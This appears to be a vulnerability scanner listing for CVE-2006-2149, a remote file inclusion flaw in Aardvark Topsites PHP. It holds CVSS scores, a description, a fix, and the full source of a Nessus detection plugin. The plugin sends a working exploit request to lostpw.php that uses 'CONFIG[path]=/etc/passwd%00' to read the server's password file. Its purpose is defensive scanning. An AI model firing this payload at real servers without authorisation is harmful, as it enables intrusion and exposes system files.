6.4 Medium
CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
NONE
AV:N/AC:L/Au:N/C:P/I:P/A:N
0.038 Low
EPSS
Percentile
92.0%
Aardvark Topsites PHP is installed on the remote host. It is an open source toplist management system written in PHP.
The application does not sanitize user-supplied input to the ‘CONFIG[path]’ variable in some PHP files, for example, ‘lostpw.php’ This allows an attacker to include arbitrary files, possibly taken from remote systems, and to execute them with privileges under which the web server operates.
The flaw is exploitable if PHP’s ‘register_globals’ setting is enabled.
#%NASL_MIN_LEVEL 70300
#
# Script Written By Ferdy Riphagen
# <f[dot]riphagen[at]nsec[dot]nl>
#
# Script distributed under the GNU GPLv2 License.
#
# Original advisory / discovered by :
# http://milw0rm.com/exploits/1732
#
include('deprecated_nasl_level.inc');
include('compat.inc');
if (description)
{
script_id(21329);
script_version("1.21");
script_set_attribute(attribute:"plugin_modification_date", value:"2022/04/11");
script_cve_id("CVE-2006-2149");
script_bugtraq_id(17940);
script_xref(name:"EDB-ID", value:"1732");
script_xref(name:"SECUNIA", value:"19911");
script_name(english:"Aardvark Topsites CONFIG[path] Parameter Remote File Inclusion");
script_set_attribute(attribute:"synopsis", value:
"The remote system contains a PHP application that is prone to remote
file inclusion attacks.");
script_set_attribute(attribute:"description", value:
"Aardvark Topsites PHP is installed on the remote host. It is an open
source toplist management system written in PHP.
The application does not sanitize user-supplied input to the
'CONFIG[path]' variable in some PHP files, for example, 'lostpw.php'
This allows an attacker to include arbitrary files, possibly taken
from remote systems, and to execute them with privileges under which
the web server operates.
The flaw is exploitable if PHP's 'register_globals' setting is
enabled.");
script_set_attribute(attribute:"see_also", value:"http://www.aardvarktopsitesphp.com/forums/viewtopic.php?t=4301");
script_set_attribute(attribute:"solution", value:
"Either disable PHP's 'register_globals' or upgrade to Aardvark
Topsites PHP version 5.0.2 or later.");
script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:N");
script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C");
script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
script_set_attribute(attribute:"exploit_available", value:"true");
script_set_attribute(attribute:"vuln_publication_date", value:"2006/04/30");
script_set_attribute(attribute:"plugin_publication_date", value:"2006/05/08");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_set_attribute(attribute:"cpe", value:"cpe:/a:avatic:aardvark_topsites_php");
script_set_attribute(attribute:"thorough_tests", value:"true");
script_end_attributes();
script_category(ACT_ATTACK);
script_family(english:"CGI abuses");
script_copyright(english:"This script is Copyright (C) 2006-2022 Ferdy Riphagen");
script_dependencies("http_version.nasl");
script_require_keys("www/PHP");
script_exclude_keys("Settings/disable_cgi_scanning");
script_require_ports("Services/www", 80);
exit(0);
}
include("global_settings.inc");
include("http_func.inc");
include("http_keepalive.inc");
include("misc_func.inc");
port = get_http_port(default:80, embedded:TRUE);
if (!get_port_state(port)) exit(0);
if (!can_host_php(port:port)) exit(0);
if (thorough_tests) dirs = list_uniq(make_list("/topsites", "/aardvarktopsites", cgi_dirs()));
else dirs = make_list(cgi_dirs());
foreach dir (dirs) {
res = http_get_cache_ka(item:string(dir, "/index.php"), port:port);
if(res == NULL) exit(0);
if (egrep(pattern:"Powered By <a href[^>]+>Aardvark Topsites PHP<", string:res)) {
uri = "FORM[set]=1&FORM[session_id]=1&CONFIG[path]=";
lfile = "/etc/passwd";
req = http_get(item:string(dir, "/sources/lostpw.php?", uri, lfile, "%00"), port:port);
recv = http_keepalive_send_recv(data:req, port:port, bodyonly:TRUE);
if (recv == NULL) exit(0);
if (egrep(pattern:"root:.*:0:[01]:.*:", string:recv) ||
egrep(pattern:"Warning.+main\(/etc/passwd\\0\/.+failed to open stream", string:recv)) {
security_warning(port);
exit(0);
}
}
}
Vendor | Product | Version | CPE |
---|---|---|---|
avatic | aardvark_topsites_php | cpe:/a:avatic:aardvark_topsites_php |